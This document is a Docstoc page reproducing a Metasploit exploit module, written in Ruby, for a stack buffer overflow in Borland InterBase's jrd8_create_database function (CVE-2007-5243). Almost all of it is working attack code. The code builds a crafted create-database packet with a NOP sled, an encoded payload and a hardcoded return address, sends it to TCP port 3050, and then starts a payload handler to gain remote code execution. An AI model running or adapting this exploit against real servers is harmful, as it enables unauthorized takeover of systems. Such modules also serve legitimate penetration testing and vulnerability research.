Docstoc

Borland InterBase 2007_ 2007 sp2 jrd8_create_database Buffer Overflow

Document Sample
Borland InterBase 2007_ 2007 sp2 jrd8_create_database Buffer Overflow Powered By Docstoc
					                 Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow                                     Page 1/3
  1    ##
  2    # $Id$
  3    ##
  4
  5    ##
  6    # This file is part of the Metasploit Framework and may be subject to
  7    # redistribution and commercial restrictions. Please see the Metasploit
  8    # Framework web site for more information on licensing and terms of use.
  9    # http://metasploit.com/framework/
  10   ##
  11
  12
  13   require ’msf/core’
  14
  15
  16   class Metasploit3 < Msf::Exploit::Remote
  17
  18            include Msf::Exploit::Remote::Tcp
  19
  20            def initialize(info = {})
  21                    super(update_info(info,
  22                            ’Name’             => ’Borland InterBase jrd8_create_database() Buffer Overflow’,
  23                            ’Description’      => %q{
  24                                       This module exploits a stack overflow in Borland InterBase
  25                                       by sending a specially crafted create request.
  26                            },
  27                            ’Version’          => ’$Revision$’,
  28                            ’Author’           =>
  29                                       [
  30                                               ’ramon’,
  31                                               ’Adriano Lima <adriano@risesecurity.org>’,
  32                                       ],
  33                            ’Arch’             => ARCH_X86,
  34                            ’Platform’         => ’linux’,
  35                            ’References’       =>
  36                                       [
  37                                               [ ’CVE’, ’2007−5243’ ],
  38                                               [ ’OSVDB’, ’38606’ ],
  39                                               [ ’BID’, ’25917’ ],
  40                                               [ ’URL’, ’http://www.risesecurity.org/advisories/RISE−2007002.txt’ ],
  41                                       ],
  42                            ’Privileged’       => true,
  43                            ’License’          => MSF_LICENSE,
  44                            ’Payload’          =>
  45                                       {
  46                                               ’Space’ => 128,
  47                                               ’BadChars’ => "\x00\x2f\x3a\x40\x5c",
  48                                       },
  49                            ’Targets’          =>
  50                                       [
  51                                               # 0x0804cbe4 pop esi; pop ebp; ret
  52                                               [
Adriano Lima                                                                                                               10/03/2007
                Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow                                     Page 2/3
  53                                                       ’Borland InterBase LI−V8.0.0.53 LI−V8.0.0.54 LI−V8.1.0.253’,
  54                                                       { ’Ret’ => 0x0804cbe4 }
  55                                                ],
  56                                        ],
  57                              ’DefaultTarget’   => 0
  58                   ))
  59
  60                   register_options(
  61                           [
  62                                   Opt::RPORT(3050)
  63                           ],
  64                           self.class
  65                   )
  66
  67           end
  68
  69           def exploit
  70
  71                   connect
  72
  73                   # Create database
  74                   op_create = 20
  75
  76                   length = 544
  77                   remainder = length.remainder(4)
  78                   padding = 0
  79
  80                   if remainder > 0
  81                           padding = (4 − remainder)
  82                   end
  83
  84                   buf = ’’
  85
  86                   # Operation/packet type
  87                   buf << [op_create].pack(’N’)
  88
  89                   # Id
  90                   buf << [0].pack(’N’)
  91
  92                  # Length
  93                  buf << [length].pack(’N’)
  94
  95                  # It will return into this nop block
  96                  buf << make_nops(length − payload.encoded.length − 4)
  97
  98                  # Payload
  99                  buf << payload.encoded
  100
  101                 # Target
  102                 buf << [target.ret].pack(’V’)
  103
  104                 # Padding
Adriano Lima                                                                                                              10/03/2007
                Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow   Page 3/3
  105                buf << "\x00" * padding
  106
  107                # Database parameter block
  108
  109                # Length
  110                buf << [1024 * 32].pack(’N’)
  111
  112                # Random alpha data
  113                buf << rand_text_alpha(1024 * 32)
  114
  115                sock.put(buf)
  116
  117                handler
  118
  119          end
  120
  121   end




Adriano Lima                                                                            10/03/2007

				
DOCUMENT INFO